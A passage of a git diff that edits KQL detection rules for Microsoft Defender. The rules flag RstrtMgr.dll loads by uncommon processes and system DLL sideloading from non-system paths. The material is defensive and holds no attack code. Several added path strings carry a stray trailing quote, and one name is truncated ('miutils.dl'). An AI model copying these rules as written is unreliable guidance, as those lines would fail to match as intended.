"C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\")))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql index 1982b74c..157e46ac 100644 --- a/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql +++ b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql @@ -12,4 +12,4 @@ // - Processes related to software installation DeviceImageLoadEvents -| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp")))) \ No newline at end of file +| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\'" or (InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\'" or InitiatingProcessFolderPath startswith "C:\\$WinREAgent\\'" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\'" or InitiatingProcessFolderPath startswith "C:\\Program Files\\'" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\explorer.exe'" or InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysNative\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\'" or InitiatingProcessFolderPath startswith "C:\\WUDownloadCache\\'") or ((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp" and InitiatingProcessFolderPath startswith "C:\\Users\\'")))) and (not((InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql b/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql index c1aa955e..515402aa 100644 --- a/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql +++ b/KQL/rules/windows/image_load/potential_system_dll_sideloading_from_non_system_locations.kql @@ -9,4 +9,4 @@ // - Legitimate applications loading their own versions of the DLLs mentioned in this rule DeviceImageLoadEvents -| where (FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certcli.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cfgmgr32.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\d3dx9_43.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sensapi.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\textshaping.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsdapi.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll") and (not(((FolderPath endswith "\\version.dll" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or (FolderPath endswith "\\d3dx9_43.dll" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.DirectXRuntime_") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\SyChpe32\\")))) and (not((((FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl") and FolderPath startswith "C:\\Program Files\\Arsenal-Image-Mounter-") or FolderPath startswith "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (FolderPath endswith "\\PolicyManager.dll" and (FolderPath startswith "C:\\Program Files\\CheckPoint\\" or FolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\")) or (FolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath endswith "\\wldp.dll" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs") or (FolderPath endswith "\\mswb7.dll" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" and FolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll")))) \ No newline at end of file +| where (FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certcli.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cfgmgr32.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\d3dx9_43.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or 